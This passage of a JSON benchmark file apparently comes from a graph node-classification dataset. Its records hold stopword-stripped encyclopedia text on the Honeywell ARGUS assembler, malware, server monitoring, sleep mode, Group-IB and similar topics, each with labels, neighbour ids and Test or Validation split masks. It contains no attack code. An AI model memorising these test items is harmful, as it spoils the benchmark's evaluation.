bit address register contains bank address 0 31 using 5 bits word bank using 11 bits incrementing recommended addresses b argus n r0,3 means use register r0 increase 3 register addressed directly manner word main memory argus z r0,3 means read write register r0 directly increase 3 increase recommended writing applies 8 registers called index registers takes 3 bits specify index register another 7 specify offset 0 127 offset added full-length main memory address powerful tool helpful processing multiword text record tape buffers usually addressed way argus x0,35 0,35 means use index register 0 increase number 35 decimal read write location main memory change value x0 argus address field dash meant field would ignored processor thereby nullifying part usual action command mentioned program access 32 registers 8 special functions 16 registers r0 r15 general purpose 8 x0 x7 index registers index addressing possible index registers direct indirect addressing applicable general purpose index registers would probably work registers would bad practice sc sequence counter sh sequence history csc cosequence counter csh cosequence history msk mask register au1 au2 operation sequence counter always contains full address command running normally commands executed location order sequence history contains last value sequence counter value stored immediately upon jumping subroutine otherwise impossible return cosequence counter history perform functions command x beginning argus location msk register holds full location first mask see au1 au2 used internally commands especially tn also used programs however risk internal operation might interfere wise choice argus line defines word memory normal operation processor performs command address order commands order jump another address direct addressing bank commands wa ba da different ways obtain numbers addresses b add together put result address c. commands bs ds subtract number address b number address placing result address c. wa word add treats two input numbers binary numbers sign often used add increment known address ba bs binary add binary subtract treat two input numbers signed binary da ds decimal add decimal subtract treat two input numbers signed decimal leftmost four bits define sign zero sign positive otherwise negative command dm multiplies number address b number address placing left half result address c. remaining low end digits left lop low output register transferred main memory address tx ts command dm fully supported floating point adaptor absence simulation required tx transfer address address c. address b must inactive see modes addressing ts transfer address address b jump sequence command address c. c must direct address optionally b inactive command becomes pure jump nearest machine gets goto command mt transfer address address c several times number times specified decimal number address field b number true address converted binary positioned operation section machine language command value large address c must indirect increment one individual transfer operates different word command rarely used experience application programming however may useful operating systems compilers tn transfer address address c. transfer a+1 c+1 continue total number times specified address b mt decimal number ends binary operation section machine command command frequently used applications especially “ blanking ” areas text command used registers au1 au2 manage address increments na compare addresses b equal continue normal unequal jump address c. la compare addresses b unsigned binary less equal b continue normal otherwise jump c. loop counter la safer na logic goes astray na loop could run away pr proceed nothing command nevertheless would take time three addresses would inactive could used loop wait operator take action perhaps reminding argus commands translated initial value binary address memory actual value would go address continuing addresses b c long necessary lines use constants would location code reference active commands oct punched letter number translated three bit octal code 0 becomes 000 1 becomes 001 2 becomes 010 ... 7 becomes 111 hex punched letter number translated four bit hexadecimal code 0 becomes 0000 1 becomes 0001 ... 9 becomes 1001 b g indicate decimal 10 15 binary 1010 1111 honeywell hexadecimal code used b g ibm used f. dec punched letter number translated four bit decimal code like hexadecimal except 0 9 valid alf punched letter number translated according honeywell binary code alphanumeric numbers letters symbols x text plus separate entries x text address field x h allowing 12 bit section word encoded using one methods oct hex dec leftmost 4 bits used denote sign number mask constant location entry maskname good practice put masks together argus case argus would put together consecutive words maximum number masks 15 mask could used modify action command could change value word example tx maskname would apply mask “ maskname ” tx command masking essential switch word command valuable commands installations standard use switch word full address first mask would placed msk register offset individual mask would placed command section machine language command specified consequently program needed one set masks could used segment switch word commands used move bits word bit positions two switch word commands similar switch word extract argus command swe maskname address source c address destination b address field amount switch x n x b representing binary decimal alphanumeric i.e units 1 4 6 bits respectively l r left right operation word obtained address bits moved left right number size unit specified bits “ fell ” end put back opposite end shifted word passed mask bit bit mask bit 1 shifted bit would copied otherwise 0 bit would passed modified word placed address c switch word command switch word superimpose sws syntax action differed mask stage mask bit 0 unshifted rather shifted bit placed output word mask bit 1 action swe example address contains 8 characters 6 bits abcdefgh mask onechar contains 1 right-most 6 bits 0 elsewhere command swe onechar a,4 r c address c contain 0000000d command sws onechar a,4 r c address c contain abcdefgd machine language shifts represented binary right argus codes x n format reduced binary right macro would called l macroname would request assembler insert argus text macro “ macroname ” point done early stage assembly argus translated machine code quite macros standard library held tape customers could add macros get put would get item input tape buffer put item output tape buffer reading writing record appropriate two types subroutine one entirely written argus example using subroutine suba type subroutine delivered machine language macro wrapper normally written honeywell staff macro used command gosub call subroutine honeywell 1800 optional floating point adaptor scientific computing set commands commands also available simulation form hardware include adaptor recommended regular use argus floating point commands regardless whether adaptor absence argus would supply machine language simulation true floating point operation input output device addresses machine level two octal digits 0-7 argus level two letters a-g first digits identified controller second digit identified device number controller tape processing one unit data tape called honeywell manuals record ibm called still calls block subdivision record called item ibm called record ibm terminology became american standard commands command rw aa would rewind tape tape unit aa octal 00 command rf aa would read next record tape unit aa octal 00 command rb aa would read back previous record tape unit aa octal 00 without delivering data amend existing tape could use rf find first record n't want rb reach space wf write onwards command wf ab would write next record tape unit ab octal 01 command rf ga would read next card card reader device ga octal 70 address would first word buffer read write operation normal use two buffers device reading writing could run parallel processing called double-buffering buffer size limiting factor size “ records ” blocks core memory limited preparing write record tape item terminated end item word prescribed code record terminated ortho word error checking followed end record word output buffer filled items compute ortho cc command used calculate ortho word provide end record word compute ortho command addresses b marked first last word positions next record would written wf command finally control would returned main program normal application work peripheral commands except perhaps rw would placed subroutine argus commands deal administration programs order assemble program following required administration commands required program created changed u newprog progname cards follow complete new program called progname u reassmb progname cards follow revisions existing program progname u newseg progname segname cards follow complete new segment called segname new existing program called progname u segment progname segname cards follow revisions segment segname program progname u endseg end segment revisions u endprog end program revisions ascher opler myra gray 1961 design multiprogrammed algebraic compiler subscription",
    "neighbors": [
      4881,
      7514,
      3323,
      8606
    ],
    "mask": "None"
  },
  {
    "node_id": 7515,
    "label": 4,
    "text": "Malware:malware malware portmanteau malicious software software intentionally designed cause damage computer server client computer network malware damage implanted introduced way target computer take form directly executable code scripts so-called active content microsoft windows forms data kinds malware largely referred media computer viruses worms trojan horses ransomware spyware adware scareware among terms malware malicious intent acting interest computer user—and include software causes unintentional harm due deficiency typically described software bug programs officially supplied companies considered malware secretly act interests computer user example one point sony music compact discs silently installed rootkit purchasers computers running microsoft windows intention preventing illicit copying also reported users listening habits unintentionally created extra security vulnerabilities one strategy protecting malware prevent harmful software gaining access target computer reason antivirus software firewalls strategies used help protect introduction malware addition checking presence malware malicious activity recovering attacks many early infectious programs including first internet worm written experiments pranks today malware used black hat hackers governments steal personal financial business information malware sometimes used broadly government corporate websites gather guarded information disrupt operation general however malware used individuals gain information personal identification numbers details bank credit card numbers passwords since rise widespread broadband internet access malicious software frequently designed profit since 2003 majority widespread viruses worms designed take control users computers illicit purposes infected zombie computers used send email spam host contraband data child pornography engage distributed denial-of-service attacks form extortion programs designed monitor users web browsing display unsolicited advertisements redirect affiliate marketing revenues called spyware spyware programs spread like viruses instead generally installed exploiting security holes also hidden packaged together unrelated user-installed software sony bmg rootkit intended preventing illicit copying also reported users listening habits unintentionally created extra security vulnerabilities ransomware affects infected computer system way demands payment bring back normal state example programs cryptolocker encrypt files securely decrypt payment substantial sum money malware used generate money click fraud making appear computer user clicked advertising link site generating payment advertiser estimated 2012 60 70 active malware used kind click fraud 22 ad-clicks fraudulent addition criminal money-making malware used sabotage often political motives stuxnet example designed disrupt specific industrial equipment politically motivated attacks spread shut large computer networks including massive deletion files corruption master boot records described computer killing attacks made sony pictures entertainment 25 november 2014 using malware known shamoon w32.disttrack saudi aramco august 2012 best-known types malware viruses worms known manner spread rather specific types behavior computer virus software embeds executable software including operating system target system without user knowledge consent run virus spread executables hand worm stand-alone malware software actively transmits network infect computers definitions lead observation virus requires user run infected software operating system virus spread whereas worm spreads categories mutually exclusive malware may use multiple techniques section applies malware designed operate undetected sabotage ransomware computer virus software usually hidden within another seemingly innocuous program produce copies insert programs files usually performs harmful action destroying data example pe infection technique usually used spread malware inserts extra data executable code pe files 'lock-screens screen lockers type “ cyber police ” ransomware blocks screens windows android devices false accusation harvesting illegal content trying scare victims paying fee jisut slocker impact android devices lock-screens jisut making nearly 60 percent android ransomware detections trojan horse harmful program misrepresents masquerade regular benign program utility order persuade victim install trojan horse usually carries hidden destructive function activated application started term derived ancient greek story trojan horse used invade city troy stealth trojan horses generally spread form social engineering example user duped executing e-mail attachment disguised unsuspicious e.g. routine form filled drive-by download although payload anything many modern forms act backdoor contacting controller unauthorized access affected computer trojan horses backdoors easily detectable computers may appear run slower due heavy processor network usage unlike computer viruses worms trojan horses generally attempt inject files otherwise propagate spring 2017 mac users hit new version proton remote access trojan rat trained extract password data various sources browser auto-fill data mac-os keychain password vaults malicious software installed system essential stays concealed avoid detection software packages known rootkits allow concealment modifying host operating system malware hidden user rootkits prevent harmful process visible system list processes keep files read types harmful software contain routines evade identification and/or removal attempts merely hide early example behavior recorded jargon file tale pair programs infesting xerox cp-v time sharing system backdoor method bypassing normal authentication procedures usually connection network internet system compromised one backdoors may installed order allow access future invisibly user idea often suggested computer manufacturers preinstall backdoors systems provide technical support customers never reliably verified reported 2014 us government agencies diverting computers purchased considered targets secret workshops software hardware permitting remote access agency installed considered among productive operations obtain access networks around world backdoors may installed trojan horses worms implants methods since beginning 2015 sizable portion malware utilizes combination many techniques designed avoid detection analysis common least common increasingly common technique 2015 adware uses stolen certificates disable anti-malware virus protection technical remedies available deal adware nowadays one sophisticated stealthy ways evasion use information hiding techniques namely stegomalware survey stegomalware published cabaj et al 2018 malware exploits security defects security bugs vulnerabilities design operating system applications browsers e.g older versions microsoft internet explorer supported windows xp vulnerable versions browser plugins adobe flash player adobe acrobat reader java se sometimes even installing new versions plugins automatically uninstall old versions security advisories plug-in providers announce security-related updates common vulnerabilities assigned cve ids listed us national vulnerability database secunia psi example software free personal use check pc vulnerable out-of-date software attempt update malware authors target bugs loopholes exploit common method exploitation buffer overrun vulnerability software designed store data specified region memory prevent data buffer accommodate supplied malware may provide data overflows buffer malicious executable code data end payload accessed attacker legitimate software determines early pcs booted floppy disks built-in hard drives became common operating system normally started possible boot another boot device available floppy disk cd-rom dvd-rom usb flash drive network common configure computer boot one devices available normally none would available user would intentionally insert say cd optical drive boot computer special way example install operating system even without booting computers configured execute software media soon become available e.g autorun cd usb device inserted malware distributors would trick user booting running infected device medium example virus could make infected computer add autorunnable code usb stick plugged anyone attached stick another computer set autorun usb would turn become infected also pass infection way generally device plugs usb port even lights fans speakers toys peripherals digital microscope used spread malware devices infected manufacturing supply quality control inadequate form infection largely avoided setting computers default boot internal hard drive available autorun devices intentional booting another device always possible pressing certain keys boot older email software would automatically open html email containing potentially malicious javascript code users may also execute disguised malicious email attachments 2018 data breach investigations report verizon cited cso online states emails primary method malware delivery accounting 92 malware delivery around world computing privilege refers much user program allowed modify system poorly designed computer systems users programs assigned privileges malware take advantage two ways malware overprivileged users overprivileged code systems allow users modify internal structures users today would considered over-privileged users standard operating procedure early microcomputer home computer systems distinction administrator root regular user system systems non-administrator users over-privileged design sense allowed modify internal structures system environments users over-privileged inappropriately granted administrator equivalent status systems allow code executed user access rights user known over-privileged code also standard operating procedure early microcomputer home computer systems malware running over-privileged code use privilege subvert system almost currently popular operating systems also many scripting applications allow code many privileges usually sense user executes code system allows code rights user makes users vulnerable malware form e-mail attachments may may disguised malware attacks become frequent attention begun shift viruses spyware protection malware protection programs specifically developed combat malware preventive recovery measures backup recovery methods mentioned computer virus article specific component anti-virus anti-malware software commonly referred on-access real-time scanner hooks deep operating system core kernel functions manner similar certain malware would attempt operate though user informed permission protecting system time operating system accesses file on-access scanner checks file 'legitimate file file identified malware scanner access operation stopped file dealt scanner pre-defined way anti-virus program configured during/post installation user notified may considerable performance impact operating system though degree impact dependent well scanner programmed goal stop operations malware may attempt system occur including activities might exploit bugs trigger unexpected operating system behavior anti-malware programs combat malware two ways real-time protection malware works identically real-time antivirus protection software scans disk files download time blocks activity components known represent malware cases may also intercept attempts install start-up items modify browser settings many malware components installed result browser exploits user error using security software anti-malware though many sandbox browsers essentially isolate browser computer hence malware induced change also effective helping restrict damage done examples microsoft windows antivirus anti-malware software include optional microsoft security essentials windows xp vista windows 7 real-time protection windows malicious software removal tool included windows security updates patch tuesday second tuesday month windows defender optional download case windows xp incorporating mse functionality case windows 8 later additionally several capable antivirus software programs available free download internet usually restricted non-commercial use tests found free programs competitive commercial ones microsoft system file checker used check repair corrupted system files viruses disable system restore important windows tools task manager command prompt many viruses removed rebooting computer entering windows safe mode networking using system tools microsoft safety scanner hardware implants type general way detect malware also harms compromised websites breaking reputation blacklisting search engines etc websites offer vulnerability scanning scans check website detect malware may note outdated software may report known security issues last resort computers protected malware infected computers prevented disseminating trusted information imposing air gap i.e completely disconnecting networks however malware still cross air gap situations example removable media carry malware across gap december 2013 researchers germany showed one way apparent air gap defeated airhopper bitwhisper gsmem fansmitter four techniques introduced researchers leak data air-gapped computers using electromagnetic thermal acoustic emissions grayware term applied unwanted applications files classified malware worsen performance computers may cause security risks describes applications behave annoying undesirable manner yet less serious troublesome malware grayware encompasses spyware adware fraudulent dialers joke programs remote access tools unwanted programs may harm performance computers cause inconvenience term came use around 2004 another term potentially unwanted program pup potentially unwanted application pua refers applications would considered unwanted despite often downloaded user possibly failing read download agreement pups include spyware adware fraudulent dialers many security products classify unauthorised key generators grayware although frequently carry true malware addition ostensible purpose software maker malwarebytes lists several criteria classifying program pup types adware using stolen certificates turn anti-malware virus protection technical remedies available internet access became widespread viruses spread personal computers infecting executable programs boot sectors floppy disks inserting copy machine code instructions programs boot sectors virus causes run whenever program run disk booted early computer viruses written apple ii macintosh became widespread dominance ibm pc ms-dos system first ibm pc virus wild boot sector virus dubbed c brain created 1986 farooq alvi brothers pakistan executable-infecting viruses dependent users exchanging software boot-able floppies thumb drives spread rapidly computer hobbyist circles first worms network-borne infectious programs originated personal computers multitasking unix systems first well-known worm internet worm 1988 infected sunos vax bsd systems unlike virus worm insert programs instead exploited security holes vulnerabilities network server programs started running separate process behavior used today worms well rise microsoft windows platform 1990s flexible macros applications became possible write infectious code macro language microsoft word similar programs macro viruses infect documents templates rather applications executables rely fact macros word document form executable code notion self-reproducing computer program traced back initial theories operation complex automata john von neumann showed theory program could reproduce constituted plausibility result computability theory fred cohen experimented computer viruses confirmed neumann postulate investigated properties malware detectability self-obfuscation using rudimentary encryption doctoral dissertation subject computer viruses combination cryptographic technology part payload virus exploiting attack purposes initialized investigated mid 1990s includes initial ransomware evasion ideas",
    "neighbors": [
      4100,
      6149,
      8197,
      10245,
      8,
      8200,
      8205,
      8206,
      2067,
      8215,
      2075,
      28,
      2084,
      4133,
      10278,
      43,
      10283,
      46,
      10295,
      10297,
      2114,
      4165,
      81,
      87,
      8281,
      4186,
      8288,
      6241,
      10338,
      2147,
      8292,
      2151,
      106,
      107,
      8302,
      119,
      8315,
      10364,
      2175,
      8320,
      131,
      10372,
      138,
      2187,
      10380,
      2192,
      2193,
      4240,
      6288,
      4245,
      150,
      4247,
      10392,
      156,
      157,
      6303,
      6305,
      2213,
      171,
      175,
      4272,
      10420,
      8387,
      10436,
      2251,
      4304,
      10448,
      4309,
      2262,
      6360,
      10457,
      4314,
      8413,
      224,
      225,
      2275,
      6373,
      10477,
      6382,
      4344,
      10492,
      4356,
      10502,
      2324,
      2325,
      278,
      4374,
      10523,
      8478,
      6431,
      297,
      8489,
      300,
      8493,
      6454,
      10556,
      4421,
      4423,
      6473,
      8526,
      4435,
      6484,
      4448,
      6496,
      10598,
      8551,
      2409,
      10603,
      4462,
      4464,
      6513,
      6520,
      8574,
      8580,
      4487,
      8584,
      4490,
      2443,
      10637,
      4498,
      6550,
      10657,
      8615,
      10664,
      8617,
      4522,
      441,
      6588,
      8640,
      2508,
      467,
      10707,
      10710,
      8664,
      6623,
      4584,
      4585,
      2538,
      2539,
      6635,
      10730,
      2542,
      6643,
      6646,
      507,
      4605,
      2558,
      6653,
      10756,
      535,
      6679,
      537,
      10775,
      4644,
      4648,
      4649,
      8753,
      2611,
      4659,
      8764,
      575,
      4672,
      4677,
      10823,
      2634,
      8779,
      4689,
      10835,
      8789,
      8797,
      2654,
      4703,
      6752,
      612,
      2661,
      4710,
      10852,
      4725,
      8824,
      10872,
      10875,
      639,
      6786,
      6797,
      10898,
      4755,
      4756,
      2709,
      10903,
      665,
      2717,
      4765,
      10914,
      6820,
      681,
      2733,
      688,
      2737,
      2742,
      8886,
      700,
      10952,
      719,
      2783,
      4843,
      2796,
      10987,
      2811,
      8956,
      11006,
      2815,
      4863,
      6917,
      778,
      8971,
      8978,
      4883,
      2837,
      790,
      6938,
      4892,
      8998,
      4903,
      808,
      11052,
      2864,
      2865,
      9024,
      4945,
      9041,
      2902,
      857,
      858,
      2907,
      4956,
      4957,
      11103,
      7012,
      9063,
      4972,
      877,
      9068,
      7024,
      11126,
      9082,
      9087,
      899,
      7044,
      901,
      11140,
      5000,
      9102,
      11152,
      11159,
      11163,
      11166,
      2975,
      5024,
      5025,
      11168,
      11175,
      9129,
      939,
      5057,
      7106,
      9154,
      9160,
      971,
      9166,
      7127,
      984,
      3032,
      11225,
      988,
      5087,
      9186,
      9187,
      11244,
      1017,
      9215,
      1024,
      3072,
      11266,
      1032,
      11272,
      5131,
      9227,
      11278,
      9233,
      1046,
      9242,
      3106,
      11299,
      9256,
      11313,
      5173,
      1083,
      7227,
      3135,
      1088,
      1094,
      7251,
      5221,
      11365,
      3192,
      7289,
      5245,
      1150,
      1151,
      5246,
      5249,
      9341,
      1155,
      9351,
      7304,
      11401,
      9356,
      5261,
      1169,
      9364,
      3225,
      9375,
      5281,
      11433,
      9395,
      3252,
      7356,
      3262,
      7365,
      7368,
      5325,
      3283,
      7380,
      3290,
      9435,
      1245,
      5349,
      1254,
      9460,
      7413,
      3320,
      5370,
      7418,
      5373,
      7421,
      1279,
      7426,
      3333,
      11526,
      3342,
      9488,
      7441,
      1299,
      3347,
      3350,
      5404,
      9518,
      1337,
      5433,
      7482,
      11583,
      9536,
      3395,
      9550,
      11604,
      3423,
      7522,
      3428,
      11621,
      11622,
      3433,
      5483,
      1393,
      5492,
      9591,
      9594,
      5500,
      3455,
      9600,
      7553,
      3461,
      3462,
      9607,
      7560,
      1417,
      7564,
      11662,
      3473,
      3482,
      9630,
      1440,
      5540,
      3495,
      1451,
      5547,
      9646,
      3505,
      3506,
      3520,
      9664,
      7618,
      3525,
      7633,
      5591,
      7639,
      9688,
      9695,
      1504,
      3555,
      9712,
      9715,
      1529,
      3581,
      9726,
      5631,
      7680,
      5636,
      3590,
      3595,
      9745,
      9761,
      3620,
      9771,
      3629,
      7730,
      9780,
      1589,
      3643,
      7739,
      9791,
      1608,
      3657,
      9800,
      1622,
      1629,
      3683,
      3688,
      3704,
      7804,
      5757,
      3711,
      7809,
      5764,
      3724,
      5776,
      1681,
      1688,
      1690,
      3739,
      9885,
      3744,
      7851,
      3757,
      7855,
      9904,
      3774,
      1727,
      9922,
      3789,
      7886,
      7887,
      1745,
      7893,
      3807,
      3814,
      5877,
      1785,
      7929,
      5886,
      3843,
      3852,
      5902,
      7955,
      10003,
      3867,
      10015,
      10017,
      1827,
      5924,
      3880,
      5928,
      10026,
      3887,
      5935,
      7983,
      10033,
      7996,
      5971,
      8022,
      1882,
      1888,
      8032,
      5986,
      1892,
      3941,
      1896,
      3944,
      8045,
      8047,
      1907,
      3956,
      10103,
      8061,
      10110,
      8064,
      3969,
      10132,
      10141,
      6059,
      1965,
      4013,
      1970,
      4023,
      1979,
      4027,
      6076,
      10173,
      4032,
      6080,
      6081,
      8133,
      1992,
      1994,
      6091,
      10190,
      8148,
      2005,
      4054,
      10209,
      2018,
      10210,
      2027,
      10221,
      4080,
      4081,
      4083,
      4087,
      2041
    ],
    "mask": "None"
  },
  {
    "node_id": 7516,
    "label": 4,
    "text": "PA_Server_Monitor:pa server monitor pa server monitor server monitoring network monitoring software application developed power admin llc main function software monitor performance servers network devices windows linux environments data kept customers servers stored cloud agentless monitoring software watch ping cpu memory disk snmp traps events available historical reports apps available ios android power admin llc privately held company founded professionals located olathe kansas outside downtown kansas city area power admin providing professional grade system monitoring products since 1992 types business smbs fortune 500 companies power admin also developed two popular utilities used world paexec allows user launch windows programs remote windows computers without needing install software remote computer first written alternative microsoft psexec tool originally sysinternals mark russinovich could redistributed sensitive command-line options like username passwords sent clear text source code readily available github power admin also developed speedfanhttpagent speedfan http agent exports allows access speedfan utility alfredo milani comparetti temperature data across network via simple http request pa server monitor monitors event logs disk space running services web page content snmp object values log files processes ping response time directory quotas changed files directories equipped monitor thousands servers/devices single installation via satellite monitoring services extensive reporting get status reports servers/devices group summaries uptime historic stats providing actions alerts customizable email sms types notifications suppression escalation certain notifications also automatically restart services run custom scripts capabilities include satellite monitoring remote offices/locations across firewalls and/or across internet without vpn agentless server monitoring bulk config feature speed changes across many servers/devices",
    "neighbors": [
      11221,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 7517,
    "label": 9,
    "text": "Trace_tree:trace tree trace tree data structure used runtime compilation programming code trace trees used type 'just time compiler traces code executing hotspots compiles hotspots entered compiled code run instead traces statement executed including within function calls entire execution path compiled different compiling individual functions compiler gain information optimizer operate remove overhead calls anytime compiled code makes call code jitted interpreter called continue",
    "neighbors": [
      2620
    ],
    "mask": "Test"
  },
  {
    "node_id": 7518,
    "label": 1,
    "text": "DBIx::Class:dbix :class dbix :class often abbreviated dbic object-relational mapper perl used map relational database table rows perl objects generates sql queries transparently application developer also implements active record pattern popular web application frameworks catalyst dancer",
    "neighbors": [
      5249,
      5253,
      8582,
      3080,
      3988,
      10276,
      6313,
      1837,
      4398,
      10413,
      3763,
      9014,
      4294,
      9286,
      7764,
      11610,
      11492,
      2281,
      8941,
      9467,
      3837
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7519,
    "label": 2,
    "text": "Sleep_mode:sleep mode sleep mode suspend ram low power mode electronic devices computers televisions remote controlled devices modes save significantly electrical consumption compared leaving device fully upon resume allow user avoid reissue instructions wait machine reboot many devices signify power mode pulsed red colored led power light computers entering sleep state roughly equivalent pausing state machine restored operation continues point applications files open sleep mode gone various names including stand suspend suspend ram machine state held ram placed sleep mode computer cuts power unneeded subsystems places ram minimum power state sufficient retain data large power saving laptops automatically enter mode computer running batteries lid closed undesired behavior altered operating system settings computer must consume energy sleeping order power ram able respond wake-up event sleeping pc case machine standby power covered regulations many countries example united states limiting power one watt initiative 2010 addition wake-up press power button pcs also respond wake cues keyboard mouse incoming telephone call modem local area network signal hibernation also called suspend disk linux saves computer operational data fixed disk turning computer completely switching computer back computer restored state prior hibernation programs files open unsaved data intact contrast standby mode hibernation mode saves computer state hard disk requires power maintain whereas standby mode saves computer state ram requires small amount power maintain sleep mode hibernation combined contents ram first copied non-volatile storage like regular hibernation instead powering computer enters sleep mode approach combines benefits sleep mode hibernation machine resume instantaneously also powered completely e.g due loss power without loss data already effectively state hibernation mode called hybrid sleep microsoft windows windows xp hybrid mode supported portable apple macintosh computers compatible hardware running microsoft windows vista newer well linux distributions running kernel 3.6 newer acpi advanced configuration power interface current standard power management superseding apm advanced power management providing backbone sleep hibernation modern computers sleep mode corresponds acpi mode s3 non-acpi device plugged windows sometimes disable stand-by functionality whole operating system without acpi functionality seen older hardware sleep mode usually restricted turning monitor spinning hard drive sleep mode first introduced pc hardware supported correctly could cause problems peripherals n't detect transition rarely problem newer hardware operating systems microsoft windows 2000 later support sleep operating system level os-controlled acpi s4 sleep state without special drivers hardware manufacturer windows vista fast sleep resume feature saves contents volatile memory hard disk entering sleep mode aka hybrid sleep power memory lost use hard disk wake user option hibernating directly wish older versions prior windows vista sleep mode under-used business environments difficult enable organization-wide without resorting third-party pc power management software result earlier versions windows criticized wasting energy remains market third-party pc power management software newer versions windows offering features beyond built operating system products offer active directory integration per-user/per-machine settings advanced offering multiple power plans scheduled power plans anti-insomnia features enterprise power usage reporting vendors include 1e nightwatchman data synergy powerman software verdiem surveyor sleep macs running macos consist traditional sleep safe sleep power nap system preferences safe sleep referred sleep since safe sleep also allowed state restored event power outage unlike operating systems hibernate never offered option 2005 macs running mac os x v10.4 began support safe sleep feature saves contents volatile memory system hard disk time mac enters sleep mode mac instantaneously wake sleep mode power ram lost however power supply interrupted removing batteries without ac power connection mac would wake safe sleep instead restoring memory contents hard drive safe sleep capability found mac models starting october 2005 revision powerbook g4 double-layer sd mac os x v10.4 higher also required hack enabled feature well older macs running mac os x v10.4 2012 apple introduced power nap os x mountain lion 10.8 select mac models power nap allows mac perform tasks silently icloud syncing spotlight indexing low energy tasks performed battery power higher energy tasks performed ac power widespread use symbol campaign launched add set power characters unicode february 2015 proposal accepted unicode characters included unicode 9.0 characters miscellaneous technical block code points 23fb-fe symbol ⏾ x23fe defined power sleep symbol",
    "neighbors": [
      8829,
      521,
      6281,
      6797,
      11549,
      929,
      3109,
      7983,
      2226,
      7604,
      823,
      4032,
      1098,
      9035,
      1741,
      2383,
      4178,
      6486,
      11095,
      4444,
      8161,
      10223,
      2811,
      4221,
      11647
    ],
    "mask": "None"
  },
  {
    "node_id": 7520,
    "label": 4,
    "text": "Elie_Bursztein:elie bursztein elie bursztein born 1 june 1980 leads anti-abuse research team google best known research anti-fraud abuse novel attacks web service video games work applied cryptography prior google bursztein post-doctoral fellow computer science stanford university focused captchas security usability elie bursztein obtained computer engineering degree epita 2004 master degree computer science paris 7/ ens 2004 supervision patrick cousot phd computer science école normale supérieure de cachan 2008 supervision jean goubault-larrecq phd thesis tilted anticipation games théorie des jeux appliqués à la sécurité réseau anticipation game game theory applied network security showed combine model-checking temporal logic game theory find optimal responses network attacks stanford university post-doctoral fellow stanford security laboratory unit computer science department focuses network computer security 2014 bursztein published first study account manual hijackers kurt thomas et al published google attempt reduce phone verified account fraud 2015 kurt thomas et al received p best practical award study malicious ads injectors joseph bonneau et al got www'15 best student paper award publishing first practical study secret questions security usability using google data 2009 bursztein presented first complete analysis microsoft dpapi data protection application programming interface jean michel picod 2011 j. lagarenne m. hamburg d. boneh used private set intersection protocols defend game map hacking 2014 adam langley made chrome mobile roughly three times faster implementing new tls cipher suite uses algorithms chacha20 poly1305 bursztein research captchas aims make puzzles easier humans solve harder computers crack main contributions easier captcha human used recaptcha generic algorithm break text-based captcha 2009 bursztein showed steven bethard ebay audio captchas broken 2010 studied s. bethard c. fabry d. jurafsky j. c. mitchell humans perform real world captchas running large-scale study 2011 demonstrated r. beauxis h. paskov d. perito c. fabry j. mitchell non-continuous audio captcha ineffective bursztein part team stanford researchers broke nucaptcha security despite company claims next generation video-based captcha security told cnet news 2012 able break nucaptcha video scheme 90 percent success 2010 defcon showed build generic map hack software 2012 defcon demonstrated fuzz online games including diablo 3 league legend 2014 defcon showed use machine learning predict opponent play card based game hearthstone blizzard request tool never made public notable achievements web mobile security include notable awards",
    "neighbors": [
      5977,
      653,
      2558,
      519
    ],
    "mask": "Test"
  },
  {
    "node_id": 7521,
    "label": 2,
    "text": "Moused:moused moused mouse daemon freebsd systems works console driver support mouse operations text console user programs first appeared freebsd 2.2 currently located codice_1 mouse daemon listens mouse port default codice_2 supplies mouse data virtual mouse driver sysmouse 4 user process wants use mouse simply opens codice_3 reads like normal file makes possible console user processes x window system share mouse",
    "neighbors": [
      7425,
      2180,
      1927,
      1801,
      10761,
      274,
      9625,
      1946,
      4636,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      9009,
      11698,
      11573,
      1718,
      9784,
      1465,
      5177,
      5819,
      3006,
      11459,
      4423,
      9927,
      8266,
      8395,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      6361,
      8410,
      4571,
      6491,
      9306,
      607,
      3551,
      1891,
      1637,
      998,
      4073,
      8816,
      2545,
      3058,
      7027,
      9201,
      2421,
      9844,
      11506,
      2424,
      1273,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 7522,
    "label": 4,
    "text": "Group-IB:group-ib group-ib develops software hardware proactive cyber defence 2015 gartner agency included group-ib top 7 global vendors threat intelligence 2017 company became leader russia threat intelligence security services market analysis conducted idc became one top-5 threat intelligence vendors forrester vendor landscape external threat intelligence 2017 report group-ib global hq located singapore group-ib founded 2003 group students bauman moscow state technical university headed ilya konstantinovich sachkov acting agency investigating cyber-attacks since group-ib involved range incident response investigations across world actively cooperating international partners detect perpetrators bring justice group-ib participated first successful cybercrime case russia organizers criminal groups identified arrested criminals involved financial theft bank accounts using malware pcs mobile devices phishing attacks targeted attacks financial institutions russia company generally involved series international operations leverages close cooperation international law enforcement agencies get criminals wherever hide according group-ib 80 high-profile investigation cases field high-tech crime russia supported group-ib experts 2010 group-ib established largest computer forensics laboratory eastern europe 2011 company established computer emergency response team cert —the first round-the-clock computer security incident response team eastern europe called cert-gib status competent security organization recognized coordination center tld ru administrator national top-level domains .ru .рф collaboration certs worldwide company developed series effective intellectual property protection services group-ib successfully protected sochi 2014 olympic brand products ticket sales blocked pirated links tv series movies owned sony pictures paramount pictures fox tv series discovery channel amedia exclusive rights hbo tv series russia well fraudulent websites abusing brands popular banks payment systems since 2012 group-iв developing early warning system provide cyber defence companies around world 2015 gartner included group-ib core product—group-ib intelligence—in top 7 global threat intelligence solutions along products developed ibm fireeye rsa check point since 2007 group-ib cooperating microsoft 2015 two companies presented joint research economic impact cyber-attacks group-ib resident moscow-based skolkovo foundation dubbed russian silicon valley part skolkovo innovative projects group-ib created so-called cybercop global counter-cybercrime system company also established additional office innopolis—a science park tatarstan russia 2010 leta group investment management company information technology acquired 50 group-ib assets 2013 group-ib management bought leta group share mid-2016 russian-founded altera capital run capital bought 10 percent stake group-ib according company announcement group-ib leverage investments develop products create r hubs middle east southeast asia latin america well hire local forensic specialists improve sales performance american european asian markets according gartner involved high-profile investigations allows group-ib get information cybercriminals relationships intelligence addition investigation materials forensics expertise gib threat data collection based high-tech infrastructure includes gib intelligence service uses personalized information security strategy planning making time-sensitive decisions tweaking protection tools gives time incidents prevention allowing urgently discover theft clients employees identifiers track modifications tactics tools used criminal groups potentially interested company prioritize threats based expert forecasts tds hardware software unit preventing infection vulnerabilities usage corporate networks tds sensors track suspicious activities corporate network cert-gib experts reveal critical threats immediately inform information security service help put stop incident evolving tds polygon allows start isolated environ suspicious files downloaded users received mail obtain objective conclusion degree harmfulness based classification formed 